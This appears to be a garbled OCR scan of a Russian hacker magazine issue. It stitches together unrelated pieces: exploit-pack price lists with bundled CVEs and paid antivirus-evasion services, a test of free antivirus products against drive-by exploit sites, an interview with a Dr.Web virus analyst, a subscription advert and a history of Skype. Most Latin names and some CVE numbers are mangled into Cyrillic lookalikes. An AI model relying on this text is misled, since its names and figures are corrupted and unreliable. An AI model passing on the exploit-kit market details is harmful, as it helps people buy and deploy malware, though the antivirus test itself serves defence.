СѴЕ-20 10-0806, АсІоЬе АсгоЬаІ Реабег 
Цена (версия 2.0): $400 



• Сгітераск Ехріоіі Зузіет 

Состав: МОАС, 05Н0ѴѴ, М509-002, ЕІазЫ 0, АсІоЬе 
АсгоЬаІ Реабег, 6РЕ 
Цена (версия 2.8.1): $400 

• Еіеопоге Ехріоііз раск 

Состав: МОАС, б ОТ, РЭЕ соІІаЬ.деІІсоп, РОЕ соІІаЬ. 
соІІесіЕтаіІІпЬ, РРЕ ЫеѵѵРІауег, баѵа Э5В 1.5/1. 6 
Цена (версия 1.4.1): $1500 

При продаже сплойтпак обычно привязывается к 
рабочему домену и ІР. Ребилд пака на новый домен/ 
ІР — оплачивается отдельно и стоит дополнительно 
около $50. 

Также продавцы сплойтпаков предлагают услуги по 
«защите» от антивирусов: такая работа стоит $50-80 
за обращение. 



АсІоЬе ІЛііІ . ргіпСГ — СѴЕ-2008-2992 
АсбоЬе СеСІсоп - СѴЕ-2009-0927 
АсІоЬе Месііа . пеѵІРІауег — СѴЕ-2 009-4324 
АЬоЪе РсН: ІіЬСіГГ — СѴЕ-2 01 0-018 8 

Наиболее часто используемые эксплойты под 6АѴА: 

6АѴА 

Безегіаііге — СѴЕ-2008-5353 
СеСЗоипЬВапк — СѴЕ-2009-3867 

ТЕСТИРУЕМ! 

Как же для всего этого многообразия выбрать адекват- 
ный тест? Сейчас становятся все более актуальными так 
называемые динамические тестирования антивирусов. То 
есть, не банальный скан файлов вредоносных программ 
(а все ли они реально «вредоносны», и не является ли 
часть файлов мусором? :)), а проведение теста в усло- 
виях, максимально приближенных к реальным. Браузер на 
тестируемом компе направляется на зараженный сайт, где 
непосредственно располагается набор эксплойтов или же 
скрипт (простой Итате), которые перенаправляют браузер 
на другой веб-сайт с эксплойтами. В ходе эксплуатации 
уязвимости браузера или его компонентов происходит 
загрузка и выполнение стороннего кода, вредоносной про- 
граммы. Исходя из этого, антивирус может блокировать 
заражение пользовательского ПК на различных этапах: 




Предотвращение заражения с установленным КАѴ 



1. Детектирование вредоносного скрипта, внедренного в 
страницу взломанного сайта; 

2. Блокировка открытия хоста с набором эксплойтов по 
базе фишинговых сайтов и сайтов, распространяющих 
вредоносное ПО; 

3. Детектирование непосредственно кода эксплойта еще 
до его выполнения браузером; 

4. Детектирование выполнения шеллкода; 

5. Детектирование (как сигнатурное, так и эвристическое) 
и удаление загруженного бинарника — инсталлятора вре- 
доносной программы; 

6. Определение вредоносности по поведению в системе и 
последующий карантин. 

Для предотвращения заражения достаточно успешного 
детектирования на любом из этих этапов. 

Также можно выделить защитные продукты, которые 
имеют при себе так называемую «песочницу», что позво- 
ляет запускать браузер в виртуальной среде как «недове- 
ренное» приложение, что ограничивает процесс браузера 
в правах в системе. Любое приложение, запущенное 
процессом браузера также становится «недоверенным». 
Защитные продукты, имеющие при себе «песочницу» 
являются более эффективными в плане защиты от атак 
типа Бгіѵе-Ьу, так как не требуют постоянного пополне- 
ния баз сигнатур, сайтов и «докручивания» эвристиков. 
Примерами таких защитных программ являются комбай- 
ны АѴА5Т! I піегпеі 5еси гііу, Казрегзку I піегпеі ЗесигТу, 
2опеА1агт Ехігете Зесигку, НІР5 БеІ'епзеѴѴаи и др. В 
большинстве тестов используются только платные анти- 
вирусные программы, и совсем не уделяется внимание 
ітее-версиям. Мы решили исправить этот недочет и 
протестировать бесплатные варианты наиболее распро- 
страненных у нас антивирусов: АѴІВА, АѴ6 и АѴА5Т!. Ну, а 
чтобы добавить в это тестирование перцу и попробовать 
понять, имеет ли смысл вообще качать бесплатные анти- 
вирусы, мы добавим сюда популярный платный антивирус 
— Казрегзку апб-ѵігиз. 

Антивирусы, которые мы будем тестировать, несколько 
отличаются по функционалу: 

АѴА51! 

Файловый монитор 




> Дуй 

• На диске лежат 
скриншоты детек- 
тирования Огіѵе-Ьу 
ата к тести руе м ы м и 
антивирусами. 

• Также на дискеты 
найдешь видеоролик, 
демонстрирующий, 
как можно с помощью 
отладчика ОНуОЬд 
получить файл кон- 
фигурации руткита 
ТОБЗ (ТОЗЗ, ТісІЗегѵ, 
Аіигеоп]. 
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МАІЛ/ѴАРЕ 




Пример обфускации скрипта РЬоепіх ехріоіі раск 



сканер оп-бетапб. 

Почтовый антивирус 
Веб - антивирус 

Модуль блокировки сайтов, распространяющих вредонос- 
ное ПО 

Модуль анализа поведения 

дѵе 

Файловый монитор 
сканер оп-бетапб 
Почтовый антивирус 
Веб - антивирус 
Антифишинговый модуль 

АѴІКА 

Файловый монитор 
сканер оп-бетапб 

КАѴ 

Файловый монитор 




Зараженный 

сайтрЬрпике.огд 



сканер оп-бетапб 
Почтовый антивирус 
Веб - антивирус 

Модуль блокировки сайтов, распространяющих вредонос- 
ное ПО 

Модуль анализа поведения 
Сканер уязвимостей 

Создание диска восстановления системы 
Устранение последствий заражения 

Итак, переходим непосредственно к тестированию. Тест мы будем про- 
водить по следующей методике: 

1. Создаем тестовые стенды на базе Ѵппѵѵаге ѴѴіпсіоѵѵб ХР 5РЗ 32- Ь И: 
с браузером Іпіегпеі Ехріогег 7.0.5730.13 (целенаправленно не 
обновляем систему, чтобы дать эксплойтам возможность сработать). 
Ставим «дырявые» наиболее распространенные уязвимые приложе- 
ния — АбоЬе Веабег 8.1.1 и 6АѴА \ге 1 .5.0.1 0. Таким образом, атака 
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АѴІРА решила передохнуть : 



будет идти на три приложения — сам браузер, на АбоЬе Пеабег и 
6АѴА. 

2. Устанавливаем на стенды антивирусный софт, настройки не меняем 
— оставляем все как есть. Что предложит инсталлятор, то и выполняем. 
Мы же законопослушные граждане :]. После установки обновляемся, 
перезагружаемся. 

3. Создаем основной зпарзбоі, где у нас будут обновленные антивиру- 
сы, готовые к тесту. 

4. Далее, используем сайт таІѵѵагесІоітіаіпІізПсот и отслеживаем 
поступление свежих ОРР, содержащих ехріоіі: раск. Будем выбирать из 
всех самые свежие поступления, проверять перед тестом, что рауіоаб 
(тот бинарный файл, который загружается и выполняется шелкодом 
эксплойта, вредоносная программа] не детектируется всеми, кем 
можно, что он рабочий и успешно отрабатывает на тестовой системе. 
Также будем выбирать различные ехріоіі; раск’и из всех распростра- 
ненных и используемых на текущий момент. 

5. Открываем наш зпарзбоі с установленным и обновленным анти- 
вирусом, обновляемся и открываем в браузере зараженный сайт. 
Наблюдаем за происходящим, отмечая возможные детекты. Если 
эксплойт все же запустил в системе вредоносную программу, то 
убеждаемся, что она установилась и прекрасно работает. Собираем 
созданные таіѵѵаге файлы-компоненты, которые не детектируются, и 
отправляем в вирлаб антивируса, который позволил себе такую сла- 
бость :). Как файлы будут добавлены — пытаемся обновиться и проле- 
чить систему. Успешность/безуспешность лечения помечаем. 
Результаты тестирования можно увидеть в сводной таблице теста. 
Красным цветом выделены бинарники, которые заинсталлировались в 
системе, и антивирус не смог предотвратить заражение. 



ТРАКТОВКА РЕЗУЛЬТАТОВ 

Как видно из результатов, антивирусы Казрегзку и АѴА5Т! показали луч- 
ший результат по блокировке заражения методом Огіѵе-Ьу. Лучший, но 
не идеальный :]. Как же так? Обновленный антивирус, оказывается, не 
панацея от заражения вредоносным кодом через веб? Да! Именно так. 
Чтобы обеспечивать себе действительно высокий уровень защиты от 
всевозможных таіѵѵаге, распространяющихся через инет, следует при- 
держиваться следующих правил: 

1. Работать под ограниченной учетной записью; 

2. Активировать автоматическое обновление ѴѴіпбоѵѵз или же само- 
стоятельно отслеживать выход заплаток, загружать их и устанавливать 
вовремя; 

3. Проверять наличие обновлений и выхода новых версий 
всего софта, установленного на ПК. Наиболее важно это 
делать в отношении продукции компании АбоЬе (АсгоЬаІ 
Пеабег, РІазЬ Ріауег], программ 6АѴА, ѴѴіпРір, Рігеіох, Орега, 
РохЛ, НеаІРІауег; 

4. Желательно использование антивирусного ПО с наличием ЗапбЬох 
(так называемая «песочница») и модуля проверки уязвимых приложе- 
ний. Или же использовать отдельный софт, который дополнит функ- 
ционал антивируса; 

5. Не открывать ссылки, пришедшие неизвестно от кого, и не 
запускать неизвестные приложения, либо известные, но загруженные 
с источников, в которых ты неуверен; 

6. Обновлять базы сигнатур установленного антивируса, тг 
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МАІЛЛ/АРЕ 



Антивирусное ремесло 



Задумавшись о непростой работе 
борцов с малварью, мы решили 
задать несколько вопросов главному 
вирусному аналитику компании йг. ѴѵеЬ 
Игорю Здобнову. 




ЧЕМ ВЫ ЗАНИМАЛИСЬ ДО РАБОТЫ ВИРУСНЫМ АНАЛИТИКОМ? 

Восемь лет назад я был студентом Санкт-Петербургского государствен- 
ного университета аэрокосмического приборостроения. 

В то время у меня, как и у всех студентов, были какие-то увлечения... 

К примеру, очень нравились шахматы, также увлекался испанским язы- 
ком и учился программировать на ассемблере. 

ИМЕЛИ ЛИ ВЫ ПРЕДСТАВЛЕНИЕ О ВИРУСАХ И ОПЫТ РЕВЕРСИНГА 
ВИРУСОВ? 

Где-то в начале 1997 года мне в руки попала книжка Питера Абеля 
«Ассемблер и программирование для I В М РС». Вот так и началось мое 
знакомство с ассемблером, дизассемблером, а также дебаггером! 

Когда я только начинал работать вирусным аналитиком, то уже неплохо 
разбирался в архитектуре таких операционных систем как 005, ѴѴіпЗ.1 , 
ѴѴіп9х. Естественно, я знал и о вирусах под эти платформы. 

КАКОЙ СОФТ ВЫ ИСПОЛЬЗУЕТЕ В СВОЕЙ РАБОТЕ? 

Не знаю, огорчу вас или обрадую — на самом деле ничего 
сверхъестественного мы не используем. Почти вся работа вирусного 
аналитика проходит в Раг Мападег (его представлять, думаю, не надо], 
а также в Ніеѵѵ — это консольный Ьех-редактор с возможностями 
дизассемблера. У нас для него написаны плагины, позволяющие рабо- 
тать с вирусной базой. 

ЮА Рго + Нехгауз — интерактивный дизассемблер и декомпилятор, 
ставший своего рода промышленным стандартом в геѵегзе епдіпеегіпд. 
ОИуОсІЬд — отладчик пользовательского режима для платформы ѴѴіпІЧТ. 
Естественно, мы применяем и свои разработки. Одной из них является 
комплекс программ «Виртуальный аналитик». В него, например, входит 
система распознавания неизвестных вирусов на основе анализа граф 
передачи управления, позволяющая находить новые модификации 
вредоносных программ, используя базу знаний. 

КАКИЕ КОНКРЕТНЫЕ ИСТОЧНИКИ ПОЛУЧЕНИЯ ТЕЛ ВИРУСОВ 
ИСПОЛЬЗУЮТСЯ В ВАШЕЙ КОМПАНИИ, И КАКИЕ МЕЖДУ НИМИ ПРО- 
ПОРЦИИ? 

Входящий вирусный поток состоит из сэмплов, поступивших сразу из 
нескольких источников. Прежде всего, из нашей службы технической 
поддержки, в которую обращаются наши пользователи в случае столкно- 
вения с угрозой, которая еще неизвестна Ог.ѴѴеЬ. 

Также мы получаем образцы вредоносных программ для анализа 
и последующего добавления в наши вирусные базы от компаний, 
использующих наши технологии обнаружения. В частности, как извест- 
но, ядро Ог.ѴѴеЬ используется в корейском антивирусе Ѵігиз СЬазег. 
Нельзя забывать и про онлайн-сканеры, примеры которых вам 
наверняка известны (ѵігизІюіаЕсопл/щШ.огд/ѵігзсап.огд и т.д.), а 
также регулярный обмен сэмплами между вендорами из самых раз- 



ных стран. Наконец, Ьопеуроіз — так называемые системные ловушки 
или приманки, на которые в случае удачи и высокого фактора досто- 
верности попадется злоумышленник. Это основные источники посту- 
пления к нам образцов вредоносных программ. Пропорции я указывать 
не буду — пусть это останется тайной. 

ОПИШИТЕ СТАНДАРТНЫЙ РАБОЧИЙ ДЕНЬ ВИРУСНОГО АНАЛИТИКА: 
ТИПОВЫЕ ПРОЦЕССЫ И ДЕЙСТВИЯ, СТРУКТУРУ РАБОТЫ 

Стандартный вирусный аналитик... Надо понимать, что вирусная лабо- 
ратория — это не цех по изготовлению гаек... Производимый ею про- 
дукт несколько сложнее, так что расшифровка термина «стандартный 
рабочий день» будет сильно зависеть от группы людей, которая отвеча- 
ет за ту или иную часть конечного продукта. 

Если говорить об обработке входящего потока, стандартный про- 
цесс начинается с обращения пользователя. Его заявка регистри- 
руется в трекере запросов. Если была выбрана категория «подо- 
зрение на вирус», то присланный сэмпл (один или сразу несколько] 
проходит стадию предварительного автоматического анализа. Это 
происходит при условии, что на данном этапе система не смогла 
автоматически добавить объект в базу, и он уходит на так называе- 
мую «ручную обработку». 

Далее решение принимается уже вирусным аналитиком. И, естествен- 
но, от него зависит очень многое. Результатом всего этого становится 
тот факт, что заявка пользователя закрывается, и он получает автома- 
тический ответ на свой запрос. 

Есть и то, что не зависит от работы простого вирусного аналитика. 

Речь, прежде всего, о системе выпуска ежедневных баз. Она отвечает 
за сборку, дополнение и тестирование на коллекции «чистых» файлов. 

В случае возникновения ложного срабатывания система исключает из 
базы соответствующие записи и выкладывает дополнение на мастер- 
зоны обновлений. Это самый «стандартный процесс» в работе вирус - 
лаба. 

КАКОЙ ВИРУС ЗА ПОСЛЕДНЕЕ ВРЕМЯ ПОНРАВИЛСЯ И ЗАПОМНИЛСЯ 
БОЛЬШЕ ВСЕГО? 

По нашей классификации он называется ипих.НазЬег. Это файловый 
вирус, работающий на Ыпих-платформе, который заражает исполняе- 
мые файлы ЕИЕ-формата. Кроме саморепликации больше ничем и не 
занимается. 

Интересен он, прежде всего, процедурой заражения. Вирус 
использует довольно хитроумный прием с секцией .Ьазб, 
которая необходима загрузчику ЕИЕ для ускорения доступа к 
таблице символов. Ыпих.НазЬег модифицирует заголовок таким 
образом, что загрузчик больше не использует быстрый доступ к 
символам. Это позволяет записать в секцию код размером всего 
219 байт. "г 
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^^ВЫГОДА*ГАРАНТИЯ*СЕРВИС 

БУДЬ" УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 

СЭКОНОМЬ 660 РУБ. НА ГОДОВОЙ ПОДПИСКЕ! 




Замучилися искать журнал в палатках и мага 
зинах? Не хочешь тратить на это время? Не 
надо. Мы сами потратим время 
и привезем тебе новый выпуск X. 

Для жителей Москвы (в пределах МКАД) 
доставка может осуществляться 
бесплатно с курьером из рук в руки 
в течение трех рабочих дней с момента 
выхода номера на адрес офиса или 
на домашний адрес. 



Еще один удобный способ оплаты 
подписки на твое любимое издание — в любом 
р | ѵѵі из 72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 



ЕСТЬ ВОПРОСЫ? Звони по бесплатным телефонам 
8(495)780-88-29 (для москвичей) и 8(800)200-3-999 
(для жителей других регионов России, абонентов 
сетей МТС, БиЛайн и Мегафон). 




ВОПРОСЫ, ЗАМЕЧАНИЯ И ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ 
ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС іпГоІсРфс.ги 



ЭТО ЛЕГКО! 

1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта 

вЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• по электронной почте $иЬ5СгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва. 

ул. Тимура Фрунзе, д. 11, стр. 44. 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется 
в день обработки купона и квитанции 
с номера, выходящего через один 
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СОЗДАНИЕ. РАЗВИТИЕ И ПРОДАЖА ИОМПАНИИ 



Позвонить через интернет на обычный сотовый или городской телефон? 
Легко. Связаться с другим юзером в сети, установив прямой аудиови- 
зуальный контакт? Еще легче! ѴоІР и софтфоны стремительно завоевы- 
вают рынки всего мира, и на острие этой «атаки» стоит программа, чье 
название хорошо знакомо каждому - Зкуре. Вот о ней-то мы и погово- 
рим сегодня. 



ДО ЗКУРЕ, 

ИЛИ ЭКСКУРС 
В ИСТОРИЮ 

Еще многие фантасты ХІХ-ХХ веков предска- 
зывали, что рано или поздно человечество 
изобретет этакий видеофон, благодаря 
которому собеседника можно будет не толь- 
ко слышать, но и видеть. Некоторые, особо 
одаренные личности (Тесла, например] 
заговорили об этом еще в то время, когда и 
обычный-то телефон был в диковинку. 

На деле человечество справилось с изоб- 
ретением подобной штуковины скорее 
раньше, чем позже. Суди сам: еще лет 1 5 
назад трудно было помыслить о том, что сов- 
сем скоро в нашем распоряжении появятся 
компактные и мощные сотовые телефоны, 



с которых без проблем можно осуществить 
видео-звонок в любую точку мира (о том, что 
с них также можно и просто выходить в Сеть, 
слушать музыку, читать, смотреть кино и так 
далее, и говорить нечего]. 

Стоит отметить, что попытки изобретения 
видеофона как самостоятельного девайса 
— это тема, достойная отдельного рассказа. 
Например, еще в 1964 году компания АТ&Т 
умудрилась установить в Нью-Йорке, Ва- 
шингтоне и Чикаго первые будки публичных 
видеотелефонов. Аппараты, носившие имя 
РісІигерЬопе Моб I также были с помпой 
установлены в штаб-квартирах крупных 
компаний. Планировалось, что иннова- 
ция будет иметь громкий успех, и дальше 
наступит всеобщее признание. В девайсах, 
кстати, использовалось 3 пары телефонных 
проводов: одна для передачи звука и две (с 
шириной полосы 1 МГц] для передачи видео 



в каждом направлении. Изображение об- 
новлялось раз в 2 секунды. Для коммутации 
видео использовалась дополнительная АТС. 
Но публика не оценила всех этих стара- 
ний — звонок из Нью-Йорка в Вашингтон 
стоил $1 6 за 3 минуты, а в Чикаго — $27, что 
отпугнуло даже самых отъявленных гиков 
того времени. В итоге, будки были демонти- 
рованы уже в 1 968 году. 

Впрочем, мы отвлеклись. Наш сегодняшний 
рассказ пойдет совсем не о видео-таксофо- 
нах, а об идее передачи голоса и изображе- 
ния по Сети, которая появилась едва ли не 
раньше изобретения самих компьютерных 
сетей. 

Как ни парадоксально это звучит, до опре- 
деленного периода времени телефонные 
сети и сети передачи данных существовали 
независимо друг от друга. Дело в том, что 
техника и каналы тех лет просто не справля- 
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лись одновременно с тем и другим. Ученые 
бились над разрешением этой проблемы 
начиная с 60-х годов, но первые заметные 
подвижки наметились лишь в 80-е, когда 



была создана 1 5 О N (Іпіедгаіесі Эегѵісез 
ОідіТаІ Ыеіѵѵогк] — сеть, поддерживавшая 
службы для передачи речи, данных, видео 
и текста. Нотобылилишьпервыешаги.а 



ЗКѴРЕ 4.0 




настоящие результаты и фактический «день 
рождения» Ѵоісе оѵег ІР (ѴоІР) и видеокон- 
ференций пришлисьуже на 90-е годы. 
Первой ласточкой, прорвавшей плотину 
«сетевого молчания» стала прога ІпТегпеІ 
Рбопе, созданная израильтянами из компа- 
нии ѴосаІТес. Іпіегпеі РЬопе был выпущен 
в начале 1995 года и, по сути, являл собой 
банальный ІМ+софтфон, с помощью которо- 
го можно было голосом позвонить на другие 
ПК. Ното, что кажется банальным сейчас, 
тогда вызывало эмоции типа «отідосі, іГз 
тадісМ 1 1 ». И это невзирая на то, что рабо- 
тало сие чудо в полудуплексном режиме, то 
есть в одностороннем порядке, как при раз- 
говоре по рации (что неудивительно — идею 
программы основатели ѴосаІТес почерпнули 
во время службы в армии, глядя на пакетное 
голосовое радио]. 

Ни вышесказанное, ни тот факт, что качест- 
во связи обычно оставляло желать лучшего, 
не смогли встать на пути у прогресса — за 
несколько недель Іпіегпеі РЬопе скача- 
ли тысячи человек и тут же принялись им 
активно пользоваться. Это-то и послужило 
отмашкой — стало очевидно, что интерес 
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СІІ-ЗЕЕМЕ В РАБОТЕ 



но го телефонного шлюза для ІР-телефонии, 
получившего название ѴосаІТес Теіербопе 
Оаіеѵѵау (ѴТО). 

• 1 997 год подарил миру возможность 
звонить не только сПКнаПК, ноисПКна 
телефон и наоборот, а также с телефона на 
телефон. 

• 1999 год ознаменовался первой специ- 
фикацией открытого стандарта 5ІР (Зеззіоп 
ІпіІіаЕіоп РгоЕосоІз), разработкой которого 

с 1996 года занималась ребята из ІЕТР, 
и о котором речь пойдет ниже. У Н.323 
появился конкурент, который, как покажет 
время, очень быстро расправится со своим 
предшественником. 

В от та к незаметно дело и подошло к новому 
тысячелетию, азначитик созданию 5 куре. 
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публики велик, а перспективы интернет-те- 
лефонии огромны. Рыноктутже наводнили 
всевозможные клоны израильской програм- 
мы, а к концу 1 995 года в продаже и вовсе 
появилась софтина ОідіРЬопе, которая поз- 
воляла слушать и говорить одновременно. 

В стане софта для передачи видео по Сети 
дела тем временем тоже обстояли неплохо. 
Вначалевсе тех же 90-х годов умельцы из 
Корнельского университета написали про- 
грамму СЭ-ЗееМе, изначально предназна- 
чавшуюся для Мас’ов, а затем вышедшую 
и под ѴѴіпсІоѵѵз. Кстати, именно с помощью 
СІІ-ЗееМев 1994 году во время полета чел- 
нока Епбеаѵог ІЧА5А передавало на Землю 
его изображение. 

Интерес к технологи и ѴоІР, то есть к пере- 
даче речевого сигнала через интернет или 
другие ІР-сети, нарастал быстро, и уже в 
1996 году назрели вопросы стандартиза- 
ции и приятия нормативов. ІпГегпаІіопаІ 
ТеІесоттипісаЕіоп ІІпіоп — международная 
организация, определяющая рекомендации 



в области телекоммуникаций и радио, а 
также регулирующая вопросы международ- 
ного использования радиочастот, приняла 
рекомендации по стандарту Н.323, который 
основывался на почти 50 других стандартах. 
Таким образом, был принятпервый норма- 
тивдля мультимедийной коммуникации при 
помощи пакетно-ориентированных сетей, 
не гарантирующих качества обслуживания. 
Одновременно с этим открытое между- 
народное сообщество проектировщиков, 
ученых, сетевых операторов и провайде- 
ров ІпЕетеЕ Епдіпеегіпд Тазк Еогсе (ІЕТЕ), 
которое занимается развитием протоколов 
и архитектуры интернета, разработало 
протокол НеаШте Тгапзрог* РгоЕосоІ (РТР), 
нашедший применение в Н.323. 
Дальнейшее развитие ѴоІР проистекало 
следующим образом: 

• 1996 год также был отмечен заключением 
соглашения между ѴосаІТес и гигантом 
Оіаіодіс. Целью их совместного проекта 
было создание первого специализирован- 



5КѴРЕ 

5 куре принадлежит перу европейских 
прогеров, а именно — эстонцам Ахти 
Хейнла (АЫі Неіпіа], Прийту Кейсалу (Ргііі 
Казезаіи) и Яну Таллинну Цаап ТаШпп). Эти 
имена, возможно, кого-то удивят, ведь в 
последние годы создателями Зкуре чаще 
называют совсем других людей — датча- 
нина Януса Фрииса Рапиз Егііз) и шведа 
Никласа Зеннстрема (ІЧікІаз 2еппзЕгот). 
Штука втом, что верно и первое и второе. 

Не исключено, что имена трех эстонских 
разработчиков, не только вызвали удивле- 
ние, но и показались некоторым читателям 
смутно знакомыми. Если показались, спе- 
шим обрадовать — у тебя отличная память. 
Дело в том, что в начале 2000-х эти парни 
занимались разработкой незабвенной 
файлообменной Р2Р-сети Ка2аА, благодаря 
которой и снискали известность. Работа 
над Зкуре, которую господа ІТ-журналисты 
несправедливо ставят в заслугу Фри и су 
и Зеннстрему, соответственно, была уже 
после. 

«Кто же такие Зенн стрем и Фри и с?» — 
спросишь ты. Конечно, они тоже появились 
в этой истории неслучайно — эта парочка 
имела самое непосредственное отношение 
к разработке и развитию обоих проектов 
(как Ка2аА, так и Зкуре), и некоторые их 
«подвиги» буквально затмили остальную ко- 
манду. Тем не менее, называть их «создате- 
лями Зкуре» — сильное преувеличение, так 
как в первую очередь эти двое — бизнесме- 
ны и инвесторы, ноникакне разработчики. 
Подробнее о Фриисе, Зеннстреме и их роли 
в Зкуре мы расскажем отдельно чуть ниже, а 
пока давай вернемся ксамой программе. 
Активная работа над Зкуре была начата 
в 2002 году после солидных инвестиций 
со стороны Огарег Іпѵезітепі: Сотрапу, и 
в свет софтина вышла довольно быстро: 
доменные имена Зкуре. сот и Зкуре. пеЕ 
были зарегистрированы в апреле, а первый 
бета-релиз программы публика увидела 
уже в августе 2003 года. Кстати, рендомный 
интересный факт— во время разработки 
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ЗКУРЕВ ІРНОМЕ 



прога носила имя 5 куре г (сокращение 
от «Зку рееМо-реег»], и только ближе к 
завершению работбыла переименована в 
Зкуре, потому что доменное имя 5 куре г уже 
было занято. 

Итак, что же отличало Зкуре от множества 
других аналогичных программ, коих в то 
время было выпустили чуть больше, чем до 
фига? В отличие отдругого софта, пред- 
назначенного для ІР-телефонии, Зкуре 
использовал и по сей день использует для 
работы Р2Р-архитектуру, что совсем не 
удивительно, если вспомнить послужной 
список его создателей. По сути, это и есть 
одно из его основных достоинств: весь 
голосовой трафик идет через узлы сети, 
которыми являются сами пользователи 




РІСШЕРНОИЕ II ОТ КОМПАНИИ АТ&Т 




ОБЫКНОВЕННЫЙ ѴОІР ТЕЛЕФОН. ВИДЕОЗВОНКИ ПРИНИМАТЬ ТОЖЕ ОБУЧЕН 



(и чем больше пользователей используют 
систему, тем лучше она работает]. Зкуре 
умеети маршрутизировать звонки через 
компьютеры других пользователей, что поз- 
воляет юзерам, находящимися за ЫАТ или 
брандмауэром соединяться друг с другом 
(создавая повышенную нагрузку на каналы 
остальных пользователей]. 

К моменту выхода Зкуре на рынок ІР-теле- 
фонии практически весь этот рынок был 
занят софтом и железом, работающим на 
основе стандарта 5ІР, о котором пришло 
время рассказать подробнее. 

В отличие от засекреченного протокола 
Зкуре, 5ІР полностью открыт для разра- 
ботчиков, хорошо продуман и прост для 
аппаратной реализации. За образецдля 
5ІР был взят протокол НТТР-сообщения 
5ІР, как и запросы НТТР, передаются через 
интернет в текстовом виде, причем их 
форматы частично совпадают. Это заметно 
упрощает разработку и отладку программ, 
поддерживающих 5ІР, и, вполне вероятно, 
способствовало росту его популярности. 
Также как и Зкуре, ЗІРнеимеет централи- 
зованного сервера — серверов много; по 
сути, обзавестись таковым может каждый 
желающий, и все они взаимодействуют друг 
с другом. В задачи протокола входиттолько 
установка и согласование связи, при этом 
совсем не обязательно, чтобы эта связь 
была голосовой — это может быть любой 
другой потокданных (видео, мультимедиа, 



интерактивный сервис]. 5ІР ориентирован 
на работу в локальных сетях и на хороших 
интернет-каналах. 

Зкуре является полной противополож- 
ностью 51 Р, хотя некоторые данные и ука- 
зывают на то, что в основе Зкуре-протокола 
лежит именно модифицированный 51 Р. Как 
бы то ни было, различий более чем доста- 
точно: Зкуре — протокол закрытый, и в силу 
своей Р2Р-структуры использует принуди- 
тельное шифрование (данные шифруются 
при помощи АЕ5-256, для передачи ключа 
которого, в свою очередь, используется 
1024-битный ключ Р5А. Открытые ключи 
пользователей сертифицируются централь- 
ным сервером Зкуре при входе в систему 
с использованием 1 536- или 2048- битных 
сертификатов Р5А], и он куда лучше 5ІР 
приспособлен к экстремальным условиям. 
Фра за «яе го вдверь.аонвокно» наиболее 
точно отражает схему поведения Зкуре — 
закрой ему обычный диапазон портов II О Р- 
протокола, и он переключится на свободные 
ТС Р- по рты, а если прижмет совсем, Зкуре 
всегда готов использовать НТТР-прокси. 
Некоторые эксперты утверждают, что единс- 
твенный способ полностью заблокировать 
Зкуре — анализировать содержание всех 
пакетов, которые Зкуре, не забываем, шиф- 
рует. Более простые методы программа об- 
ходит. Все перечисленное уже многие годы 
серьезно напрягает спецслужбы почти всех 
стран мира — какже так, что-то невозможно 
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перехватить и расшифровать, это же опре- 
деленно непорядок! Впрочем, Швейцария, 
Австралия, Австрия, Германия и Россия уже 
намекали, что решения для прослушивания 
5 куре унихварсеналевсеже имеются. 
Критикуют 5 куре и многие эксперты в облас- 
ти безопасности, и даже хакеры. Еще в 2007 
году в сотом номере ][ Крис Касперски пос- 
вятил этому вопросу развернутую статью, 
озаглавленную «Зкуре: скрытая угроза». В 
статье Крис пишет следующее: «Зкуре — это 
черный ящике многоуровневой системой 
шифрования, напичканный антиотладочны- 
ми приемами исполняемого файла, считы- 
вающий с компьютера конфиденциальную 
информацию и передающий ее в Сеть по 
закрытому протоколу. Последний обходит 
брандмауэры и сурово маскирует свой тра- 
фик, препятствуя его блокированию. Все это 
превращает Зкуре в идеального перенос- 
чика вирусов, червей и дронов, создающих 
свои собственные распределенные сети 
внутри Зкуре-сети». 

Но покорить широкую аудиторию Зкуре уда- 
лосьнеза счет шифрования и изворотли- 
вости, но за счет двух очень важных вещей: 
простоты и отличного качеству звука. 
Начиная с самой первой версии, вышедшей 
осенью 2003 года, Зкуре поддерживал 1 0 
языков и имел максимально простой интер- 
фейс, в отличие отдругих ІМ, изначально 
заточенный именно под голосовую связь. 
Сыграло свою роль и то, что вся процеду- 
ра установки программы и регистрации 
нового пользователя была в разы проще, 
чем у конкурентов. Что до кодеков, Зкуре 
использует 5Ѵ0РС (16 кГц], АМВ-ѴѴВ (16 кГц], 
С.729 (8 кГц) и 6.71 1 (ранее использовались 
также ПВО и ІЗАС], что при достаточной ско- 
рости соединения (30-60 Кбит/с] позволяет 
получить звук, сопоставимый по качеству с 
обычной телефонной связью. 

Сразу взяв с места в карьер в 2003 году, 
Зкуре ни на минуту не останавливал- 
ся в развитии. С каждой новой версией 
появлялось все больше новых функций и 
«удобств». Перечислять все эти автоответ- 
чики, онлайновые номера, конференции, 
сервисы для отправки 5М5 и так далее 
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ІА НАСТРОЙКУ 5КѴРЕ ЕДВА ЛИ УЙДЕТ МНОГО ВРЕМЕНИ 



не имеет смысла, так как статья все же 
называется не «услуги Зкуре для чайников» 
:). Вместо этого хочется отметить другое — 
компания уверенно развивалась, невзирая 
даже на то, что в 2005 году ФриисиЗеннс- 
трем продали свое детище, уже снискавшее 
огромную популярность (74,7 млн. аккаунтов 
и в среднем 1 0,8 млн. пользователей в сети], 
компании еВау за кругленькую сумму в не- 
сколько миллиардов мертвых президентов. 

О том, что на развитии Зкуре это отразилось 
не худшим образом, ясно говорят цифры и 
факты: 

• На сегодня в Зкуре начитывается уже 
более 560 млн. аккаунтов; 

• Существуют версии Зкуре практически 
для всех известных человечеству платформ, 
включая мобильные; 

• Компания представляет весь спектр ѴоІР- 
услуг; 

• Зкуре выпускает и продает различные гад- 
жеты от гарнитур и веб- камер до полноцен- 
ных 5 куре -фо нов — телефонов, умеющих 
работать как с обычной телефонной сетью, 
так и со Зкуре. 

МЫ ДЕЛИЛИ АПЕЛЬСИН, 

ИЛИ ПАТЕНТНЫЙ 
